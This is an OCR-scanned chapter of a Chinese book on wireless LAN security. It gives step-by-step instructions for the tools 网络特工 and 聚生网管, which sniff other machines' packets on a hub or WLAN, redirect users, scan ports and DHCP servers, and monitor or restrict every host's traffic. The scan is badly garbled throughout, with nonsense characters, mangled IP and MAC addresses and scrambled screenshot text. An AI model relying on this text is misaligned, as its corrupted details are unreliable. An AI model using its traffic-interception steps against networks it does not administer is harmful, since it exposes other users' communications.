出 新 | 


mm | en | 


14.3.3 网络 特工 


网 络 特工 可 以 监视 与 主机 相连 Hub 上 所 
有 机 器 收发 的 数据 包 ; 还 可 以 监视 所 有 无 
线 局 域 网 内 的 机 器 上 网 情况 ， 以 对 非法 用 
户 进 行 管理 ， 并 使 其 登录 指定 的 IP 网 址 。 

使 用 网 络 特工 的 具体 操作 步骤 如 下 : 
下 载 并 运行 其 中 的 “网 络 特工 .exe” 
ap 即 可 打开 “网 络 特工 ” 主 窗 口 ， 如 下 
图 所 示 。 


导 Kennear - 网 堵 管 工 一 口 x 
文件 (| ”去 厨 (V) 工兵 由 吕 助 (H) 


日 下 
DE htheros Ll Gipabit 
-让 澡 管理 (右键 点 1 | IF 弛 ke. 43.0. 104 
255.0 


团 忻 检测 


-互联 必定 网 I {9 106601 


广告 垃 操 相 ;0.26575/ 平 方 保 过 /年 


选择 “工具 ”一 “选项 ”菜单 项 ， 

即 可 打开 “选项 ”对 话 框 ， 在 其 中 可 以 设 
置 “ 启 动 ”“ 全 局 热 键 ”等 属性 ， 如 下 图 
所 示 。 
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选项 XxX 
启动 杂项 
厂 操作 系统 启动 时 自动 运行 程序 [Y 退出 程序 时 需要 密码 验证 
[Y 程序 启动 时 显示 系统 托盘 图 标 | 不 显示 广告 (需要 重新 运行 程序 ) 
[程序 启动 时 显示 主 窗 口 厂 启动 时 不 显示 程序 L060 


全 局 热 键 
显示 /隐藏 主 窗口 热 键 : [Ctrl + Shift + 向 t + 了 


厂 热 键 显 示 主 窗口 时 需要 密码 验证 


-报警 声音 设置 
浏览 D360 安 全 浏览 颖 下 载 " 黑 容 工 县 "net_spy\HetSpy\wa 


con | 


[step 图 在 “网 络 特工 ” 主 窗口 左边 的 列表 
pay ee hei 
据 监 视 ” 窗 口 。 在 其 中 设置 要 监视 的 内 容 
后 ， 单 击 “ 开 始 监视 ”按钮 ， 即 可 进行 监 
视 ， 如 下 图 所 示 。 


动 Kennear - 网 诺 村 工 一 口 XxX 

文件 {F] ”到 大 (V) 工具 站 帮助 IH) 
: 并 i I ~ 

UL 卡 ||2017-C8-]4 17:2z:14.12T ED B B463CIGGS60T3-)0013ECADI351 以 太 | arp 回 应 LS2. 163. 0. 1-2 

Er htheros Ll Sigabit| | 2017-06-14 17:22:1d.346 5568 00tRECADL35P-)B463CTG36007 芝 太 IPvd tep L122. 163. 0. 104- 

| 2017-06-14 17:22:14.346 5 上 了 8 001B6CNDL35P->8403C13330N 忆 IEvd top i192. 163. 0. 104~ 

-- 户 辽 管理 ( 右 刍 点 | | 2017-08-14 17:22:1d4.440 BB R83CI336073->00186CXD1%1 以 本 辣 IEvd top L160. 183. 255.15 

玉 忻 栏 潭 2017-08-14 17: : ld4d0 6B RIICTIS36073->0012ECJD155I 出 太 问 IEvd top Lé0. 163. 255. 15 

.- 互联 早 立 2017-08-14 17:22:15 423 S75 TH 56p684775510-701005Z7TFFF 以 IFv4 op lS2. 165.0. 107— 

2017-08-14 17:22:15. .710 E675 B SPASATESSIO->0I0CEE?TFFFs Ll IFv4 np lS2. 163.0. 107— 

017-06-]4 17:22: I5 TTZ 60 B B463CISS60T3-)0017ECAD]35T 昼 IEv4 上 cp I05. 如 .81 

017-09-]4 17:2z:15.TT2 54 B 001EECADLFSF-)F493CIGG50T] 以 太 | IPv4 tcp LS2. 163. 0. 104 

017-C8-14 17 E51] Ezr B 59BB J01005x7FFFF# 以 太 IPv4 ug LS2. 163. 0. 107 

2z0t706-14 17:2216 043 te7 Bb ER )01005F7TFFF# WA IEvud wip 18. 185. 0. 107 

2017-06-14 17:22:16.230 6&9 8 BAFEG310-)01006E7FFFFL Ll IEvd ai i192. 163. 0. 107 

01 -08-4 17:.22.16 2 ob 0 Tin0gETEFP 以太 IEvd ut i 这. ] 药 .0 17 

2017-06-1t 17:22:16.5Tt 554 B 568854735510->01005Z7TFFFL 以 六 网 IEv4 udp 1 纶 . 1.0.107 

2017-06-1t 17:22.16 .552 Ee4 B 56g654775510-701005Z7TFFF 以 IFv4 oop ls2. 163. 0 107— 

2017-08-14 17:2 22 L6.T93 E65B NBCMDLISP->E40SCTSNNN 以 TEv4 tep lS2. 163. 0 104- 

< > 

hid RBF FE 六 IT NIGP 人 TE FW [7 详 R 等 报 此 祝 【了 让 唔 入 

记 IpktH | D0 n n 0 et 0 | 深 动 屏 算 暂停 


糙 扳 问 过 正字 和 中 : < 语法 正确 > 
万 保存 具 机 特 扫 到 文件 | | 点 芒 定 引 必 
从 区 性 这 下 执 据 : 计 = 


万 六 时 


i 弟 广 | 注入 ”| 却 空 [EE | 
人 
全 二 广告 位 想 租 : 0. 1 元 /平方 也 就 /年 
撞 地 未 扣 电 开 ' 字 节 ) v 
rm 
< 》 < > 


[step 园 在 “网 络 特工 ” 主 窗口 左边 的 列表 中 
pp 理 ” 选 项 ， 在 弹出 的 快捷 菜 
单 中 选择 “添加 新 网 段 ” 选项 ， 即 可 打开 
“添加 新 网 段 ” 对话 框 ， 如 下 图 所 示 。 


添加 新 网 段 Xx 
网 段 开 始 IF 地 址 : 


网 段 结 束 IF 地 址 : 192 .168 . 0 .253 
网 段子 网 摘 码 : 255 .255 ,255 . 0 
网 段 网 关 IF 地 址 : i192 .168 .0 .1 


[step 图 在 设置 网 络 的 开始 IP 地 址 、 结 束 IP 地 
子 网 掩 码 、 网 关 IP 地 址 之 后 ， 单 击 OK 
按钮 ， 即 可 在 “网 络 特 工 ” 主 窗口 左边 的 
“网 络 管理 ”选项 中 看 到 新 添加 的 网 段 ， 
如 下 图 所 示 。 
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@ Kennear - 网 过 先 工 一 口 x 
文 愉 {月 ” 豆 大 IV】 工具 由 再 动 [ 吕 


] .0. 
192. 166.0.253 
255. 2£5. 255. 0 


192. 1€6.0.1 


广告 垃 要 福 : 0 .1 元 /平方 也 入 年 


双击 该 网 段 ， 即 可 在 右边 打开 的 窗口 
中 ， 看 到 刚 设 置 的 网 段 中 所 有 的 信息 ， 如 下 
图 所 示 。 


ee Kennear - 网 治标 工 口 xX 


3 
[SD htheros Ll Gieabit Btherner 107 


-一 雪 柜上 监 视 
后 同上 虹 生理 ! 布 银 点 击 漆 加 网 息 ) 
-网 给 192. 188. 0.2 - 192. 18 


ee 


sm © 


本 有 时 


192. 168. 0. 13 
i192. 168. 0. 14 
192. 166. 0. 15 


192. 160. 0. 19 
L192. 166.0. 20 Ee 


OO OO 
EE 


同 耻 开 娩 IF 地 HE: 192.168.0 2 在 线 : 5 重新 扫 兰 网 自 
同 f8 计 来 IE 地 kE: 192. 166. 0. 253 高 法 :2 好 | 


255.256. 256.0 答 理 ;说 团 - 计 :下 和 娩 


网 晤 中 关 IF 地 直 : 192.156 0 1 - 
Rvackbht: 7493c0335073 El) _ah 册 列 太 | 


Es | 


单 击 其 中 的 “管理 参数 设置 ”按钮 ， 
即 可 打开 “管理 参数 设置 ”对 话 框 ， 在 其 
中 对 各 个 网 络 参 数 进行 设置 ， 如 下 图 所 示 。 


NR# 娄 x 
-六 数 
合用 卉 NTPH 直 | EEC 问 丫 沉 宽 :上行 32 亚 生 下行 128 JH/S 
管理 主机 频 靳 : 每 10.000 秒 一 次 “管理 路 由 频 平 : | 每 30.000 秒 一 次 
钨 略 二 一 二 


三 不 自动 扫描 同上 段 [” 保护 自己 不 入 其 它 软件 官 理 上 网 
厂 当 局 分 逢 后 不 具 被 官 理 主机 收 到 任何 强 抱 或 圭 
在 局 分 各 后 览 吾 正常 管理 党 噩 


厂 说 关 WWC 物 理 地 址 
[主机 抵抗 乱 理 时 . 启用 特殊 官 理 汗 路 


提示 | “日 志 
厂 全 部 选择 厂 全 部 选择 
三 上 线 提示 厂 下 近 Wsct 拉 止 担 示 厂 上 线 日 志 三 更 搞 IWC 赣 掉 日 志 
厂 下 线 提示 厂 管理 提示 厂 下 线 日 志 厂 管理 日 志 
厂 次回 应 提示 厂 防 放 提示 厂 竹 回 应 日 志 三 忠 部 日 过 
三 工人 8 消 鼠 提示 三 网 扯 映 射 提示 三 工作 组 消息 日 志 三 网 址 腺 射 日 志 


OK | Cancel | 


单 击 “网 址 映射 列表 ”按钮 ， 即 可 打 
开 “ 网 址 映射 列表 ”对 话 框 ， 如 下 图 所 示 。 
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网 址 狐 对 列表 x 


端口 扫 撕 参数 设置 XxX 
ww Fonnaar con 服务 器 返回 信息 : 本 区 i | 本 二 
请 点 击 过 皖 nys 用 苍 吕 - IF 版 本 : | “| 协议 类 型 : |rc ”|] 厂 显示 扫描 进度 


JIS 服务 器 I 
61. 128. 114. 133 起 始 IF: |192. 168. 0.2 
61. 128. 114. 167 


结束 IF: [192. 168. 0. 253 
网 址 映射 列表 : Cancel | 


1 re tvd) 端口 习 夫 : 0-65535 
共 它 全 部 卫 直 192 163.0. 104 二 地 rT? 于 务 二 
Www. kermesar con 不 隆 射 
叉 击 此 处 特 兴 要 被 陛 射 的 隔 址 5 不 要 站 六 前 站 中 ttp7。 双击 此 外 粳 入 她 射 IF 1v4) re i 
ee 《< 常用 端口 | 
隐蔽 性 
使 用 MAC 地 址 IDo1ESCAD13S5F (大 与 ) 


| 和 rpjb 直 [0771010 进行 扫 扣 

在 “DNS 服务 器 IP” 文 本 区 域 中 选 

中 要 解析 的 DNS 服务 器 后 ， 单 击 “ 开 始 解 在 设置 起 始 IP 和 结束 IP 之 后 ， 单 去 
析 ” 按 钮 ， 即 可 对 选中 的 DNS 服务 器 进行 ph 按钮 ， 即 可 将 常用 的 端口 显示 
解析 ， 待 解析 完毕 后 ， 即 可 看 到 该 域名 对 在 “端口 列表 ”文本 区 域内 ， 如 下 图 所 示 。 


应 的 主机 地 址 等 属性 ， 如 下 图 所 示 。 庙 口 扫 拱 参数 设置 X 


殉 址 器 时 列表 IF 版 本 : |IFv4 ”| 协议 类 型 : |TcF | 厂 显示 扫描 进度 
| [不 要 粕 入 http: /7): 超时 时 间 : Jo ” 各 

I pe 起 始 IF : lisz.168.0.2 

请 点 击 选择 DY5 服 务 吴 | ‘Bisao 受 视 信息 雪 L， 队 加 信息 教 0 ok | 
61. 126 114. 134 se 


结束 IP: |192. 168.0. 253 
间 : 0 天 0 小 B49 入 9 各 Cancel | 


1, 23, 25, 53, 80, 110, 135 一 


51. 125. 114. 167? 


39, 161, 443, 8010, 8080 


端口 列表 
T 百 
网 革 Bh 曹 天 去 J] 兰 
了 时 I 对 太 风 让 | 二 用 了 册 , 时 
其 它 宇 部 PH 0.104 本 地 ITT7 服 务 国 ) 站 吕 《常用 端口 


人 要 箱 入 辣 癌 沪 ttF:4 让 。 艰 击 此 处 稍 入 觅 册 I 14) 台 击 比 允 答 入 歇 对 Pa 


(大 与) 
进行 扫描 


添加 有 全 | OF | Cancel | 


在 “网 络 特工 ” 主 窗口 左边 的 列表 中 单 击 OK 按钮 ， 即 可 进行 端口 打 描 操 
rp geben 作 ， 在 扫描 的 同时 ， 将 扫描 结果 显示 在 下 
星空 ”窗口 ， 在 其 中 即 可 进行 端口 扫描 和 面 的 “上 日志 ”列表 中 ， 在 其 中 即 可 看 到 各 
DHCP 服 务 扫 描 操 作 ， 如 下 图 所 示 。 个 主机 开启 的 端口 ， 如 下 图 所 示 。 


动 Kennear - 网 党 乏 工 一 口 站 
文件 内 ” 竟 厂 IV】 工 暴 由 守 序 [H) 


日 卡 
theros Li Gigabit t Btbor, 


后 Fn 
92. 456. 0.2 - 192. 18 


由 hm 有 = 
扫 冲 Ee 四 he Gicabit 
四 


名 强 口 
一 池 ]92. 1 i 135 转口 
-一 -3 163.0. 108 和 s 
本 党 [为 192. 1 岗 . 0. 106 
二 2 开始 村 TE et i09 的 主机 ... 
I 为 1]92. ] 扩 .0.:089 
29:23 开始 扫 吉 IF 让 LE8.0.110 的 主机 . . . 

3 为 192. 153.0. :10 的 主机 下 在 娃 ! 
1729 :2 天 村 和 192. 168.0.1LL 的 主机 . . . 
本 为 和 192. 163:0. .11 的 主 主机 不 在 在 注 | 


一 ;I 为 1 名 .1 的 .0 112 的 主机 135 6 
三 深 为 19%. 163.0 li , 玖 主机 EE 轴 口 开 训 ! 
0 112 


主 
17: Ey 好 于 入 192. 本 0. LUd 的 主机 ... 
]32. 168.0 114 的 二 相 . L535 缮 口 开 恋 ! 


< > 
民 站 mul -J em | 数字 | 


[seep 贺 在 右边 的 列表 中 选择 “端口 扫描 ” se 在 “互联 星空 ”窗口 右边 的 列表 中 
jp 单 击 “开始 ”按钮 ， 即 可 打开 ry “DHCP 服 务 扫 描 ” 选 项 后 ， 单 击 “ 开 
“端口 打 描 参数 设置 ”对 话 框 ， 如 下 图 始 ” 按 钮 ， 即 可 进行 DHCP 服 务 扫描 操作 ， 

所 示 。 如 下 图 所 示 。 
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二， 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


大 Kennear - 吏治 答 工 加 口 x 
文件 (月 ” 琶 品 (V) 工具 [T) 码 助 (H] 


- adj | Jik 明 
| ET EE 


得 开 胡 打 看 下 为 132. 1693.0.252 的 主打 
IE 为 四 186. 0. S62 的 主机 不 在 娃 ! 
9 开 妨 3 阐 全 为 


IE(1): 61. 
中 和 3 四 128.114 167 


5.0 
殉 由 I: i we 0 1 
DHCE 扫 担任 
17:32 和 
al Be Ee IP: 1 
3 让 TE ‘ioe lS 0 LO4 
时 IE (1): $1.123.114. 134 
61. 128. 114. 167 


3 二 


秒 由 IE: 192. 188.0.1 


无 线 局 域 网 安全 辅助 
工具 


面 对 黑客 针对 无 线 局 域 网 的 种 种 攻 
击 ， 无 线 局 域 网 管理 者 可 以 使 用 局 域 网 安 
全 辅助 工具 来 对 整个 无 线 局 域 网 进行 管 
理 。 本 节 将 介绍 几 球 最 为 经 典 的 局 域 网 畏 
助 软件 ， 以 帮助 大 家 维护 无 线 局 域 网 ， 从 


而 保护 无 线 局 域 网 的 安全 。 
14.4.1 聚 生 网 管 


聚 生 网 管 系统 是 聚 生 科 技 在 深入 分 
析 了 主流 无 线 局 域 网 监控 软件 技术 的 基础 
上 ， 经 过 自主 创新 和 不 断 测试 ， 最 终 研 发 
成 功 的 一 套 优秀 的 网 络 监控 软件 。 在 无 线 
局 域 网 的 任意 一 台 计 算 机 上 安装 该 软件 就 
可 以 控制 整个 无 线 局 域 网 的 P2P 下 载 、 各 种 
聊天 工具 、 股 票 软件 、 游 戏 软件 等 ， 使 得 
网 管 人 员 可 以 在 一 台 控 制 机 上 即 可 以 控制 
任意 一 台 无 线 局 域 网 主机 ， 从 而 极 大 地 提 
高 了 工作 效率 。 


1. 安装 聚 生 网 管 


step 图 双击 下 载 的 聚 生 网 管 安装 程序 ， 即 可 
打开 “许可 证 协议 ”对 话 框 ， 在 其 中 可 以 
查看 软件 许可 协议 信息 ， 如 下 图 所 示 。 
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X 


许可 证 协议 
在 安装 膝 生 网 管 试用 版 之 前 ， 请 检阅 授权 条 款 。 


检阅 协议 的 其 余部 分 ， 请 按 [Pspn] 往 下 卷 动 页 面 。 


所 有 安装 和 使 用 《 聚 生 网 管 沙 的 用 户 必须 蒲 足 并 严格 道 守 以 下 各 项 条 款 ， 否则 请 和 
停止 安装 、 使 用 和 传播 : 


一 、《《 浓 生 网 管 涩 受 中 华人 民 共 和 国 著 作 权 法 及 中 国 和 国际 著作 权 条 约 和 其 它 知 
NE ， 用 户 不 得 有 任何 侵害 交 染 生 网 管 兴 相关 一 切 权利 的 行 


二 、 丸 浓 生 了 网管 产品 各 版 本 、 、 随 附 的 各 种 资料 一 切 所 有 权 和 知识 产权 均 由 大 势 


TT ie re 


ee 次 总 代 1 继续 训 稚 。 如 时 你 寺 定 [取消 (c)] ， 


MY 


[| 


单 击 “ 我 接受 ”按钮 ， 打 开 “ 选 定安 
装 位 置 ”窗口 ， 在 其 中 设置 程序 的 安装 上 
标 文件 天 ， 如 下 图 所 示 。 

辐 末 入江 版 实 甘 x 


选 定安 装 位 置 
选 定 滋生 了 网 宣 斌 用 版 要 安装 的 文件 夹 。 


ee 


浏览 (B)... 


所 需 空间 : 22. 9 
可 用 空间 : 54. 46B 


《< 上 一 步 (F) [ 安 蔡 (I) |] | 取消 (c) 
单 击 “安装 ”按钮 ， 即 可 开始 安装 聚 


生 网 管 程 序 ， 并 显示 安装 的 进度 ， 如 下 图 
所 示 。 


正在 安装 
染 生 网 管 坛 用 版 正在 安装 ， 请 等 候 。 
复制 到 : D: \LangQos\Policy\ 口 限制 4 络 游戏 策略 


显示 细节 (7D) 


step 加 安装 完成 后 ， 弹 出 “安装 完成 ” 窗 
口 ， 单 击 “ 关 闭 ” 按 钮 ， 完 成 程序 的 安 
装 ， 如 下 图 所 示 。 


安装 完成 
安装 程序 已 成功 析 运 行 过 成 。 


已 完成 


显示 细节 [D) 


: 上 一 步 [B) 职 消 iC) 


2. 聚 生 网 管 的 配置 


在 使 用 聚 生 网 管 这 歌 软 件 之 前 ， 需 要 
先 对 其 进行 配置 ， 配 置 聚 生 网 管 的 具体 操 
作 步 骤 如 下 : 
选择 “开始 ”一 “所 有 应 用 ”一 “ 聚 
生 网 管 ” 菜 单项， 即 可 打开 “监控 网 段 配 
置 ”窗口 ， 如 下 图 所 示 。 


监控 网 版 配 奸 一 x 


注 ; 如 果 你 尚未 创建 网 段 , 则 可 以 点 击 “ 新 建 监控 网 段 ” 即 可 进行 创 
是 ; 之 后 你 可 以 观 圭 监 注 网 段 或 单 主 迁 中 然后 点 二 “开始 监 注 ”有 即 可 
进入 主 章 町 。 


在 进行 监控 之 前 ， 需 要 添加 要 监控 的 


网 段 ， 单 击 “ 新 建 监控 网 段 ”按钮 ， 即 可 


打开 “网 段 名 称 ” 对 话 框 ， 如 下 图 所 示 。 


网 良 鱼 称 x 


Wr 监控 网 段 配置 ... 本 


读 栓 入 新 闻 上 奢 生 称 : 


VLAN 20170814182339 


注 : 请 斥 呈 使 用 条 认 网 段 包 称 以 免 出 现 司 芯 网 段 而 彩 响 正 圳 监控 ! 


|] ww | | 两 
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在 “请 输入 新 网 段 名 称 ” 下 方 的 文本 
框 中 输入 网 段 的 名 称 之 后 ， 单 击 “ 下 一 步 ” 
按钮 ， 即 可 打开 “选择 网 卡 ” 对 话 框 ， 如 下 
图 所 示 。 


选择 网 卡 x 


让 


Be 监控 网 段 配 置 .. . 


请 为 网 义 选 择 对 应 的 网 卡 : 更 新 网 卡 信息 
Atheros L1 Gigabit Ethernet 10/100/1000Base-T Contrcller ~ 
本 机 IP 地 址 : 192.168.0.104 
本 机 MAC 池 址 : 00-1E-8C-AD-13-5F 
子 光 掩 三 : 255.255.255.0 
网 关 地 址 : 192.168.0.1 
本 网 关 IP 段 : 192.168.0.0 - |192,1658.0,255 
网 关 MAC 池 址 : F4-83-CD-33-60-73 检测 


注 : 为 了 保证 正常 监 入 ,建议 点 击 “ 检 册 ” 技 钮 以 检 音 网 将 连接 状况 ; 如 果 最 终 能 
够 Ping 般 网 关 ， 则 说 胃 网 络 正 常 可 以 浆 沪 下 一 步 操 作 ; 否则 污 登 录 网 关 ( 如 路 和 由 嚣 、 
防火 二 或 交换 机 ) 侣 者 其 LAN 口 对 应 的 MAC 地 址 ,只 有 著 取 正确 的 网 关 MAC 池 址 才 
可 以 进行 监控 。 


< 上 - 步 6B) | 下 - 步 Ni > | my 帮助 
为 该 网 段 选择 对 应 的 网 卡 后 ， 单 击 
“下 一 步 ” 按钮 ， 即 可 打开 “出 口 带 宽 ” 
对 话 框 ， 如 下 图 所 示 。 


出 口 市 完 x 


本 网 段 公 网 出 口授 入 市 腕 : Auto Detect v 


在 “本 网 段 公 网 出 口 接 入 带宽 ” 右 便 
的 下 拉 列 表 中 选择 “Auto Detect (自动 检 
测 ) ”选项 后 ， 单 击 “ 完 成 ”按钮 ， 将 会 
返回 “监控 网 段 配置 ? 窗口 ， 在 其 中 即 可 
看 到 所 配置 的 监控 网 段 信 息 ， 如 下 图 所 示 。 


pA | 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


监控 网 段 配 置 


[网 可 名称 VLAN_20170814182339-- 单 网 了 
[192.168.0.104-255.255.255.0] 


注 : 如 果 你 尚未 创建 网 段 , 则 可 以 点 击 “ 新 建 鉴 控 网 段 ” 即 可 进行 创 
建 ; 之 后 你 可 以 双击 监控 网 段 或 单 去 选中 然后 点 击 “ 开 始 监控 ” 即 可 
进入 主 界面 。 


当 确 定 所 配置 的 监控 网 段 信 息 准 确 无 误 后 ， 单 击 “ 开 始 监控 ”按钮 ， 即 可 打开 “ 聚 
生 网 管 ” 主 窗口 ， 如 下 图 所 示 。 

聚 生 网 竺 V2016 活 用 版 [网 岳 名 称 :VLAN_20170814182339] 

设置 操作 日 志 显示 访问 关于 升级 大 即 运程 协助 


二 到 
O.@ © 0 O00 @ 0 0 0 © 人 Hts 
启动 管理 。 当 竹 主机 | 醒 置 第 略 。 全 局 设 什 ”去 生 防 翻 。 扩展 插件 。 日志 吉 词 | 产品 洋 解 。 同 美 对 比 。 使 用 说 明 。 尝 见 问题 。 访问 计 网 。 购 天 流 伺 。 磋 系 号 们 。 人 起 夏 方位 一些 式 周 比 
口 宝 运 。 口 自动 演唱 新 加 入 主机 并 乌 动 撕 折 | 有 JE v eA | ; 


一 口 X 


不 拆 王 /SP 山门 汪 革 训 他 庆 有 就 从 胡 U/ 襄 补 友 要 六 科 手 加 革 ,不 时 内 US6 庆 人 灯 谋 党 ， 话 芒 守 此. 
口 言 动 禁 止 无 线路 由 露 口 言 动 禁 止 手机 /平板 口 自动 森 月 随访 wifi 口 禁止 收 改 IP 口 禁止 收 改 MAC [” 癌 只 明示 |P 和 MAC 绛 定 电脑 。 ” 癌 只 对 许 IP 和 MAC 绑 定 电 脑 上 网 
1pie 址 ( 打 勾 控 齐 ) 主机 和 名 (至 去 修改 ] (所 ) 上 行 (0.00 KB/S) 【( 马 ) 下 行 (0.00 KB/S) ”连接 状态 Mt | 所 有 用 户 沪 问 日 志 ”单个 由 户 访 同日 志 ( 在 主机 和 中 单 主 ) 癌 ] 二 出 [|] 芒 芝 
口 村 192.168.0.104 控制 机 0.)0 0.00 连接 正常 00:|| 访问 时 间 协议 类 型 。” 源 |P 地 址 


源 主 机 庆 M.， 目的 IP 地 址 目的 .访问 内 容 


口 连 十 IP/MAC 变 化 口 ] 竹 出 ARP 攻 去 回 检测 晴 导 wifijwifi 共 享 检测 无 渤 路 由 弦 / 手 机 /于 板 。 | 合 寿 
相间 类 型 iP 地 址 


MAC 池 址 莉 述 


< 


> 
帮 和 基于 闪 庆 六 他 司炉 就 他 于 同 训 这 慑 考 涛 并 闻 广 他 打开 大潮 入 CV 、 抠 悦 课 作 记 芭 ,说 筷 守 论 .. 


状态 


菇 壮 记 宇 定 局 内 安海 忆 估 和 达 地 万 局 剖 学 功能 记 六 万 加 局 上 抱 富 灶 丰 疗 ,说 入 守 从 
主机 所 数 : 1 在 疆 :1 昔 竺 :0 聚 生 网 管 乞 统 国内 唯一 羌 全 禁止 迅 吉 下载 、 茜 止 QQ 游戏 、 限 制 PPS 网 将 视 频 等 


侈 提示 : 用 户 可 以 根据 需要 建立 多 个 网 段 。 如 果 想 监控 第 二 


控 第 二 个 网 段 ， 请 再 次 打开 一 个 聚 
生 网 管 的 窗口 ， 从 中 选择 想 要 建立 的 第 二 个 网 段 ， 然 后 单 击 “ 开 始 监 控 ” 按 钮 即 可 。 


3. 聚 生 网 管 的 使 用 


在 配置 完 聚 生 网 管 要 监控 的 网 段 后 ， 就 可 以 利用 该 工具 对 整个 无 线 局 域 网 进行 管理 ， 
其 具体 操作 步骤 如 下 : 


step 加 在 “ 聚 生 网 管 ” 主 窗 口中 ， 单 击 “ 启 动 管理 ”按钮 ， 即 可 扫描 到 所 有 在 线 主机 ， 并 
在 下 方 的 列表 中 显示 出 来 ， 如 下 图 所 示 。 
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第 14 章 “无 线 局 域 网 的 安全 防护 SEE 


识 置 插 作 日 志 明示 访问 关于 升级 帮 即 远程 协助 


Q.el8889888889 © 9 ei 


日 志 豆 河 | 产品 洋 解 。 同 美 对 比 。 使 用 说明 。 常见 问题 。 访问 官网 。 购买 流程 。 联系 我 们 ” 忆 类 肥 全 方 全 一 此 式 同 关 


趾 全 迁 ”自动 控制 新 加 入 主机 并 语 动 后 派 | 未 指派 策 鸡 ~ 导入 | 导出 | 二 各 皇 有 放 中 关 汪 训 全民 方 训 共用 UW 启 浴 动 大 富 入 子 轴 车 ,不 虹 攀 US6 司 厅 经 ， pr es 
门 | 弓 动 芋 止 无 线 串 由 器 口 ] 弓 动 芋 止 手机 /二 板 中 白 动 苦 月 随 社 wifi 门 荣 止 修改 IP 门 荣 止 修改 MAC ”站 只 呈 示 IP 和 MAC 痢 证 志 脑 。 [] 只 亢 许 |P 和 MAC 缆 定 电脑 上 网 


IP 地 址 人 J 多 控制 ) 主机 冬 ( 点 主 修 改 ] 已) 上行 (155.17 K.。 ( 剖 下 行 (1674.84 … 所 有 息 户 访问 互 志 。 单个 用 广 访问 日 志 [ 在 主机 幸 主 单 去 ) 口 至 出 口 拦 梧 

口 炭 192.168.0.104 控制 机 155.17 E 访问 时 间 协议 类 型 。” 源 IP 池 址 逐 主 机 源 M,.。 目的 IP 地 址 目的 .， ”访问 内 容 
口 杜 192.168.0.112 AFOIG-611211. 0.00 

口 旺 192.168.0.106 CESKTOP-5CV.. 0.)0 

口 枉 192.168.0.107 DESKTOP-D5K.。 0.)0 

口 村 192.168.0.109 -- 0.)0 

口 二 192.168.0.108 网 盗 科技 0.00 

口 硕 192.168.0.114 AFOIG-702111.。 0; 

口 显 192.158.0.10z -- 

口 杜 192 168.0.105 -- 


< > 
中岳 出 |P/MAC 到 化 ” 口 襄 十 ARP 人 帮主 。” 思 检 测 随 和 wifijwif 七 吝 。 思 窒 则 苇 千 路 白 实 / 王 机 /平板 三 震 
对 间 类 型 lp 地址 MAC 地 址 。“ 接 述 


-不 型 至 共 训 立 作 上 知 花 就 件 会 页 r 元 服务 琵 共 克文 件 订 入， 让 乔 ， 态 改 ” 由 慰 比 作用 击 ， 医 六 完 丰 -- 车 竺 启 敬 皇 古 座 安 关 月 莽 蔓 ， 摔 别 近 藻 知 ， 功 况且 下 有 万 后 三 上 人 启 竺 莹 雪 位， 医 奖 讽 丰 -…- 
状态 主机 总 数 : 9 在 污 :9 离线:0 聚 生 网 管 孝子 “创新 直 这 ”架构 ， 呼 网 段 管理 员工 上 网 行为 最 快捷 、 最 简单 ! 


[step 图 选中 主机 前 面 的 复 选 框 ， 即 可 开始 控制 并 显示 计算 机 宽带 、 上 网 网 址 或 拦截 日 志 等 
信息 ， 如 下 图 所 示 。 取 消 选 中 则 所 有 控制 全 部 失效 。 


设置 ”操作 日 志 显示 访问 关于 升级 帮 即 远程 协助 


本 
四 .和 GD 00 0 QQ 加 人 + 大 
停止 监控 所 搞 主 机 | 配置 策略 。 全 局 设 秋 安全 防务 。 扩展 插件 日志 查询 | 产品 详解 。 同 关 对 比 。 使 用 说 明 。 靠 见 问题 。” 访问 官网 。 购买 济 和 在 联系 我 们 有 电 球 了 积 地 全 和 


加 | 会 迁 。。 癌 ] 自动 控 剂 新 加 入 主机 并 与 动 指派 | 未 指派 策 驹 ( 旦 示 旁 完 , 网 址 ”~ 导入 | 导出 | 二 邯 皇 USBW 中 若 汪 就 { 人 ff 恨 方 并 共用 WU 室 疹 动 术语 入 于 加 等 ,下 时 办 USB 局 新 闯 祝 ， ps er 
口 ] 弓 动 芋 止 无 线 串 由 器 门 ] 写 动 茜 止 手机 /三 板 中 扣 动 上 沫 月 随 社 wifi 口 ] 茜 止 修改 |P 门 茉 止 收 改 MAC 。[] 只 至 示 IP 和 和 MAC 部 定 地 脑 。。[] 只 亢 许 |P 和 MAC 睹 定 电脑 上 网 


1p 地 址 ( 打 匀 控制 ) 主机 名 (点 主 修 改 | ”| 点 ) 上 行 (0.00 KB/S) (六 下 行 (0.00 KB/S) 连接 状态 MAC 池 址 所 有 用 户 访问 日 志 | 口 柄 出 [ 

口 央 192.168.0.104 控制 机 0.00 00:1E:8C:AD:13:5F 

口 村 192 168.0.112 AFOIG-511211.. 0.00 C8:60:00:0C:CC:D1 

口 山 192.158.0.106 CESKTOP-5CV.. 0. 00:23:24:.D9:86:E5 || 2017-8-14 19:05:57 192.158.0.107 本 :F..， 1.82.232.12 

回 大 192.168.0.107 CESKTOP-D5K.. 0. 58:FB:84:F8:58:10 2017-8-14 19:05:57 i 192.168.0.107 Le :E117.23.2.79 

口 矶 192.1658.0.109 -- , |, 70:E7:2C:D3:11:24 = || 2017-8-14 19:06:02 访问 192.168.0.107 要 =F 218.30.116.24 

口 量 192.168.0.108 网 将 科技 |, A0:AS:EFDE:AQ:D3 

口 村 192.168.0.114 AFOIG-702111..。 0. |. C0:C6:38:7D:A6:0E 

口 是 192.158.0.10z -- i 834:BE:52:3B:17:01 

口 杜 192 168.0.105 -- | EO0:DD:CO:CO:1A:5D 

口 杜 192.168.0.101 -- i A4:44:D1:D3:48:7B 

口 显 192.168.0.100 -- A4:5E:60:16:7A:A1 

口感 192.1658.0.103 -- ， 68:FB:7E:EA:FC:FA 
口 牵 十 IP/MAC 委 化 口 杭 出 ARP 攻 志 。” 回 检测 陋 身 wii/wifi 共 京 ”加 检测 无 线路 由 器 /手机 
时 间 尖 型 1p 地 址 MAC 直 址 。 耕 述 

-无 型 至 共 训 放 作 具 系 就 伯 会 而 刀 元 豚 稚 如 共 完 姓 阶 杂 太吉 大 ” 想 g 机 必 项 作用 去 ， 洋装 况 丰 -… 大 和 半 认定 是 司 内 安 闫 展 合 感人 二 月 展 向 党， 功 记忆 六 万 W 吕 上 民 定 古 闲 糙 ， 说 炬 二 沦 .… 


状态 : 监控 中 主机 总 数 : 12 在 和 具 :11 襄 竺 :1 


